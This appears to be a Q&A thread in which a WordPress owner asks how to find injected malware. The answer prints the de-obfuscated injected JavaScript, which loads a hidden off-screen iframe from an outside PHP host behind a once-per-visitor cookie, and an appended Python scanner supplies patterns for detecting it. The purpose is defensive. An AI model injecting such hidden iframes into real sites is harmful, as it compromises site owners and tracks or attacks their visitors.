 

How to find malicious code/malware on a website [closed]

My Wordpress website recently became infected with malware and has been blacklisted. I thought I fixed it by updating the site and plugins and removing any code I didn't recognize.

I then used Sucuri Site Checker and it seemed okay, so I submitted a review request with Google. However, Google have said that it still contains malware in the form of malicious code (they referred to it as a code injection).

I am a bit lost for what to do. Is there a way to find the bit of code which Google is finding? The domain is sudorf.co.uk but it has malware so I wouldn't advise going there - no idea what the malware will be doing.

Any help would be greatly appreciated.

EDIT: I found that code a few days ago and deleted it, then I updated all versions etc. But obviously it has come back again. Does anyone have an idea how it might be getting there? My thoughts are that it's either from a plugin, which is why I am going to remove all of them. The other is the contact form, but I didn't think this would have allowed them to edit the header.php.

Pectus Excavatum asked Sep 05 '13 14:09



1 Answer

This is pure info. Your malware looks like this when it's de-obfuscated:

    // Builds a 512x512 iframe, pushes it far off-screen so visitors never see it,
    // and loads the remote PHP page into it.
    function k09() {
        var static = 'ajax';
        var controller = 'index.php';
        var k = document.createElement('iframe');

        k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
        k.style.position = 'absolute';
        k.style.color = '512';
        k.style.height = '512px';
        k.style.width = '512px';
        k.style.left = '1000512';
        k.style.top = '1000512';

        // Write a container paragraph into the page and attach the hidden iframe to it.
        if (!document.getElementById('k')) {
            document.write('<p id=\'k\' class=\'k09\' ></p>');
            document.getElementById('k').appendChild(k);
        }
    }

    // Ordinary cookie helpers, used below so the iframe is loaded only once per visitor per day.
    function SetCookie(cookieName, cookieValue, nDays, path) {
        var today = new Date();
        var expire = new Date();
        if (nDays == null || nDays == 0) nDays = 1;
        expire.setTime(today.getTime() + 3600000 * 24 * nDays);
        document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    }

    function GetCookie(name) {
        var start = document.cookie.indexOf(name + "=");
        var len = start + name.length + 1;
        if ((!start) &&
            (name != document.cookie.substring(0, name.length))) {
            return null;
        }
        if (start == -1) return null;
        var end = document.cookie.indexOf(";", len);
        if (end == -1) end = document.cookie.length;
        return unescape(document.cookie.substring(len, end));
    }

    // Entry point: if the 'visited_uq' marker cookie is absent, set it and fire the iframe once.
    if (navigator.cookieEnabled) {
        if (GetCookie('visited_uq') == 55) {} else {
            SetCookie('visited_uq', '55', '1', '/');

            k09();
        }
    }

http://dostojewskij-gesellschaft.de/VD49Jdzr.php simply outputs "OK".

Why?

My guess is that this is an IP/traffic logger. Maybe for the hackers to check which blogs are most active and then later come back and hack that particular site (no need to waste time on a site with 2 visitors a month). This is good and bad.

The good part is that it seems that they haven't used any of your user database or anything else.

The bad part is that they might very well have downloaded your entire database since they've obviously had executing rights on your server, and might've placed their PHP files all over your server. Your best bet is to start on a fresh WP and copy plugins/themes in one-by-one while manually checking them.

Change all passwords. Even your DB login. Consider everything compromised.

h2ooooooo answered Nov 15 '22 18:11

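A defender-side way to hunt for the injected code Google is still seeing, as an added example that is not part of the question or the answer: a small Python scanner whose indicators are taken from the de-obfuscated script above (off-screen iframe, document.write injection, a visited_* gating cookie, an iframe pointing at a remote .php page) plus the common eval(base64_decode()) PHP dropper shape. The indicator names, the scan_tree walker and the sample file contents are constructed for this example, not taken from the poster's site.

```python
import re
from pathlib import Path
from typing import Dict, List

# Indicators taken from the de-obfuscated script in the answer above: an iframe built at
# runtime, pushed far off-screen (left/top = 1000512), injected with document.write, and a
# "visited_*" cookie so each visitor is hit only once. The PHP pattern is the common
# eval(base64_decode(...)) dropper shape. The indicator names are our own labels.
HIGH = {
    "offscreen_position": re.compile(r"\.style\.(left|top)\s*=\s*['\"]-?\d{5,}['\"]"),
    "visit_gating_cookie": re.compile(r"(Set|Get)Cookie\(\s*['\"]visited_"),
    "php_eval_decoder": re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}
MEDIUM = {
    "runtime_iframe": re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I),
    "document_write": re.compile(r"document\.write\s*\("),
    "iframe_src_remote_php": re.compile(r"\.src\s*=\s*['\"]https?://[^'\"]+\.php['\"]", re.I),
}

def scan_text(text: str) -> List[str]:
    """Names of every indicator that matches, high-confidence ones first."""
    hits = [name for name, rx in HIGH.items() if rx.search(text)]
    return hits + [name for name, rx in MEDIUM.items() if rx.search(text)]

def is_suspicious(text: str) -> bool:
    """One high-confidence hit, or two medium ones, is enough to flag a file for review."""
    hits = scan_text(text)
    return any(h in HIGH for h in hits) or sum(h in MEDIUM for h in hits) >= 2

def scan_tree(root: Path, suffixes=(".php", ".js", ".html")) -> Dict[str, List[str]]:
    """Walk a WordPress install (themes, plugins, uploads) and list the flagged files."""
    report: Dict[str, List[str]] = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(errors="replace")
            if is_suspicious(text):
                report[str(path)] = scan_text(text)
    return report

# Constructed samples, not files from the poster's site; the remote URL is a placeholder.
INFECTED_HEADER = """<?php wp_head(); ?>
<script>function k09(){var k=document.createElement('iframe');
k.src='http://malware-host.invalid/x.php';k.style.position='absolute';
k.style.left='1000512';k.style.top='1000512';
document.write('<p id=\\'k\\'></p>');document.getElementById('k').appendChild(k);}
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq','55','1','/');k09();}</script>"""
CLEAN_HEADER = '<?php wp_head(); ?>\n<script>document.write("<p id=ad></p>");</script>'
PHP_DROPPER = "<?php eval(base64_decode('aGVsbG8=')); ?>"
```

Run scan_tree(Path("/path/to/wordpress/wp-content")) over the live install and every flagged file gets a manual look; a clean header.php that merely calls document.write once is not flagged, while the injected one and a base64 PHP dropper are.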